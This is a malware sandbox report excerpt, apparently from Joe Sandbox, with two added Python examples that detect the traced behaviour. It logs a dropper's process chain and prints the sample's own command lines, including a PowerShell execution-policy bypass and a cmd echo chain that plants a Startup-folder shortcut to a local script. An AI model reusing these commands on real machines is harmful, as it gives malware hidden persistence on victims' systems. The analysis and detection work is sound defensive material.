Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B5F2C CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00007FF7978B5F2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797836580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00007FF797836580
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eamjnkh2.zwk.ps1 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
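Added example, not part of the Joe Sandbox report or its signature engine: the process tree above re-encoded as parent/image/command-line records and run through a handful of Sigma-style rules in Python. EVENTS is constructed from the "Process created" lines above; the rule names, the suspicious-folder list and the interpreter list are this example's own assumptions and only approximate the Sigma titles listed in the report header.

```python
"""Sigma-style triage of the process tree captured in the report above.

EVENTS is constructed from the report's "Process created" lines. Rule names,
SUSPICIOUS_DIRS, INTERPRETERS and ODD_EXE_EXTS are this example's assumptions.
"""
import re
from typing import Dict, List, Tuple

# User-writable locations from which legitimate software rarely runs (assumed list)
SUSPICIOUS_DIRS = (r"c:\users\public", r"\appdata\local\temp", r"c:\perflogs")
INTERPRETERS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe")
ODD_EXE_EXTS = (".pif", ".scr", ".com", ".cpl")
STARTUP_DIR = r"\start menu\programs\startup"

# Constructed from the report's process tree, in execution order.
EVENTS: List[Dict[str, str]] = [
    {"parent": "unknown",
     "image": r"C:\Users\user\Desktop\file.exe",
     "cmdline": r'"C:\Users\user\Desktop\file.exe"'},
    {"parent": r"C:\Users\user\Desktop\file.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\InformationCheck.exe",
     "cmdline": r'"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3'},
    {"parent": r"C:\Users\Public\InformationCheck.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows'
                 r'\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local'
                 r'\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft'
                 r'\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit')},
    {"parent": "unknown",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif",
     "cmdline": (r'"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" '
                 r'"C:\Users\user\AppData\Local\WordGenius Technologies\G"')},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('unknown' stays 'unknown')."""
    return path.rsplit("\\", 1)[-1].lower()


def in_suspicious_dir(text: str) -> bool:
    low = text.lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule this single process-creation event trips."""
    parent, image, cmd = event["parent"], event["image"], event["cmdline"]
    img, par, low = basename(image), basename(parent), cmd.lower()
    hits: List[str] = []
    # "Bypasses PowerShell execution policy": -ExecutionPolicy Bypass or the -ep short form
    if img == "powershell.exe" and re.search(r"-e(?:xecutionpolicy|p)\s+bypass", low):
        hits.append("powershell_executionpolicy_bypass")
    # "Execution from Suspicious Folder": the image itself lives in a user-writable dump location
    if in_suspicious_dir(image):
        hits.append("execution_from_suspicious_folder")
    # "Parent in Public Folder Suspicious Process"
    if in_suspicious_dir(parent):
        hits.append("parent_in_suspicious_folder")
    # "Script Interpreter Execution From Suspicious Folder": interpreter given a script from such a path
    if img in INTERPRETERS and in_suspicious_dir(low):
        hits.append("script_interpreter_from_suspicious_folder")
    # "WScript or CScript Dropper": a script host spawning a child process
    if par in ("wscript.exe", "cscript.exe"):
        hits.append("wscript_spawns_process")
    # "Windows Shell/Scripting Application File Write to Suspicious Folder": cmd redirecting into Startup
    if img == "cmd.exe" and ">" in cmd and STARTUP_DIR in low:
        hits.append("startup_folder_write_via_cmd")
    # "Drops PE files with a suspicious file extension": PE run under a non-.exe extension
    if img.endswith(ODD_EXE_EXTS):
        hits.append("executable_with_odd_extension")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Only the events that tripped at least one rule, in execution order."""
    flagged = []
    for event in events:
        hits = evaluate(event)
        if hits:
            flagged.append((basename(event["image"]), hits))
    return flagged


if __name__ == "__main__":
    for name, hits in triage(EVENTS):
        print(f"{name:22s} {', '.join(hits)}")
```

Four of the six records trip at least one rule; the initial file.exe launch and the wscript.exe start (whose parent the sandbox could not attribute) are silent on their own, which is why the chain view matters: wscript.exe only becomes interesting through the .pif child it spawns.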
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static file information: File size 2016768 > 1048576
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress, 0_2_00007FF7978C7634
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978678FD push rdi; ret 0_2_00007FF797867904
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797867399 push rdi; ret 0_2_00007FF7978673A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8742C0 pushad ; ret 1_2_00007FFD9B8742FD
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048E93F push edi; ret 3_2_0048E941
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C8A4A push FFFFFF8Bh; iretd 3_2_004C8A4C
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048EA58 push esi; ret 3_2_0048EA5A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00488B75 push ecx; ret 3_2_00488B88
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0047CBF1 push eax; retf 3_2_0047CBF8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048EC33 push esi; ret 3_2_0048EC35
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048ED1C push edi; ret 3_2_0048ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4E93F push edi; ret 8_2_00F4E941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4EA58 push esi; ret 8_2_00F4EA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F88A4A push FFFFFF8Bh; iretd 8_2_00F88A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F48B75 push ecx; ret 8_2_00F48B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4EC33 push esi; ret 8_2_00F4EC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4ED1C push edi; ret 8_2_00F4ED1E

Persistence and Installation Behavior

Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior
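Added example, not from the Joe Sandbox report: a Python audit of the Startup-folder persistence shown above, where an InternetShortcut (.url) file's URL= line points at a local .js rather than a web address. SAMPLE_URL_FILE is constructed to match what the cmd /k echo chain writes; STARTUP_DIRS, the extension sets and the kind labels are this example's own assumptions.

```python
"""Audit .url (InternetShortcut) files in the Startup folders for local script or
executable targets, the persistence trick the cmd /k echo chain above sets up.

SAMPLE_URL_FILE is constructed to match that chain's output; STARTUP_DIRS, the
extension sets and the kind labels are this example's assumptions.
"""
import ntpath
import os
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
EXE_EXTS = {".exe", ".pif", ".scr", ".com", ".cpl", ".dll"}
STARTUP_DIRS = [  # per-user and all-users Startup folders; empty env vars off Windows are harmless
    os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
    os.path.join(os.environ.get("PROGRAMDATA", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
]

# Constructed sample: what `echo [InternetShortcut] > f & echo URL="..." >> f` leaves on disk
# (cmd's echo keeps the space before the redirect, and the quotes end up inside the file).
SAMPLE_URL_FILE = (
    "[InternetShortcut] \r\n"
    'URL="C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.js" \r\n'
)


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI reader: lower-cased section and key names, values kept verbatim."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, val = line.partition("=")
            sections[current][key.strip().lower()] = val.strip()
    return sections


def normalize_target(value: str) -> str:
    """Strip shell quoting and turn file:// URLs into Windows paths."""
    t = value.strip()
    if len(t) >= 2 and t[0] == t[-1] and t[0] in "\"'":
        t = t[1:-1].strip()
    if t.lower().startswith("file:///"):      # file:///C:/dir/x.js -> C:\dir\x.js
        t = unquote(t[8:]).replace("/", "\\")
    elif t.lower().startswith("file://"):     # file://server/share/x -> \\server\share\x
        t = "\\\\" + unquote(t[7:]).replace("/", "\\")
    return t


def classify(target: str) -> str:
    """'web', 'unknown', or local_/unc_ + script|executable|other."""
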